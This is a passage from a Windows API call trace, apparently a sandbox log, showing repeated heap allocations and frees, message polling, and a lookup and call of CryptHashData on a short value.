hHeap=0x970000) returned 1 [0188.177] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0188.177] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0188.177] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0188.177] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699c8 [0188.178] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0188.178] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0188.178] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0188.178] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c68 [0188.178] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0188.178] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0188.178] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0188.178] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0188.178] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0188.179] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0188.179] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0188.179] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0188.179] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0188.179] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0188.179] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0188.179] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0188.179] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0188.179] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0188.179] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0188.179] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54dd8 [0188.179] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0188.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0188.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0188.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0188.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0188.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0188.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0188.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0188.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0188.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0188.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0188.180] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ac8 [0188.180] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9779f8 [0188.180] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0188.180] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0188.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0188.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0188.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977c68 | out: hHeap=0x970000) returned 1 [0188.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0188.180] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0188.180] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0188.180] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0188.181] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0188.181] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69c08 [0188.181] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977cf8 [0188.181] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0188.181] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0188.181] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0188.181] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0188.181] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0188.181] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0188.181] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0188.181] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0188.181] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0188.181] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0188.181] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54ee8 [0188.181] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0188.181] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0188.181] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0188.181] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0188.181] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54d18, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0188.181] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0188.181] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0188.181] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0188.181] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0188.182] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0188.182] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0188.182] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54eb8 [0188.182] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0188.182] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0188.182] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977cf8 | out: hHeap=0x970000) returned 1 [0188.182] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0188.182] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0188.182] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0188.182] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0188.182] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0188.182] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0188.182] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0188.182] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0188.182] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0188.182] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0188.182] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0188.182] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0188.182] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0188.182] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0188.182] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ff80 [0188.182] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0188.182] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0188.182] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ff80 | out: hHeap=0x970000) returned 1 [0188.182] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0188.182] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507d0 [0188.182] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0188.183] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0188.183] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0188.183] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0188.183] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0188.183] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0188.183] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0188.183] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0188.183] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0188.183] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0188.183] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0188.183] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0188.183] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0188.183] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0188.183] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0188.183] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0188.183] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0188.183] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0188.183] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0188.183] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0188.183] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0188.183] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0188.184] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0188.184] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0188.184] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0188.184] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0188.184] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0188.184] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0188.184] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0188.184] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0188.184] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0188.184] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0188.184] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0188.184] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0188.184] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0188.184] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0188.184] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0188.184] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977b18 | out: hHeap=0x970000) returned 1 [0188.184] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0188.184] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0188.184] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0188.184] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0188.184] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0188.185] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0188.185] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.185] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0188.185] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0188.185] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0188.185] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0188.185] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0188.185] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0188.185] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0188.185] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0188.185] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0188.185] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0188.185] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0188.185] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0188.185] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0188.185] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0188.185] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0188.185] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0188.185] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0188.185] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0188.185] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0188.185] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0188.185] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0188.186] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2e50a40, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0188.186] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0188.186] GetProcAddress (hModule=0x756e0000, lpProcName="CryptHashData") returned 0x756feef0 [0188.186] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0188.186] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0188.186] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0188.186] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0188.186] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0188.186] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0188.186] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0188.186] CryptHashData (hHash=0xa87050, pbData=0x2e54dd8, dwDataLen=0x3, dwFlags=0x1) returned 1 [0188.186] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0188.186] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0188.186] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0188.186] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0188.186] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0188.186] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0188.186] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0188.187] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0188.187] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0188.187] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0188.187] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0188.187] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0188.187] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0188.187] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0188.187] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0188.187] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0188.187] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0188.187] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0188.187] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0188.187] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0188.187] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0188.187] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0188.187] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0188.187] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0188.187] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0188.187] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0188.187] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0188.187] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0188.187] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0188.187] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0188.187] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0188.187] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0188.187] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0188.187] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0188.187] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977ae8 | out: hHeap=0x970000) returned 1 [0188.188] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0188.188] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0188.188] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0188.188] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0188.188] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0188.188] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0188.188] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0188.188] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0188.188] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0188.188] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0188.188] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0188.188] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0188.188] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0188.188] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0188.188] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0188.188] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0188.188] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c28 | out: hHeap=0x970000) returned 1 [0188.188] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0188.188] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0188.188] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0188.188] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0188.188] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0188.188] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0188.188] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0188.188] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69be8 [0188.188] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0188.188] HeapFree (in: hHeap=0x970000, 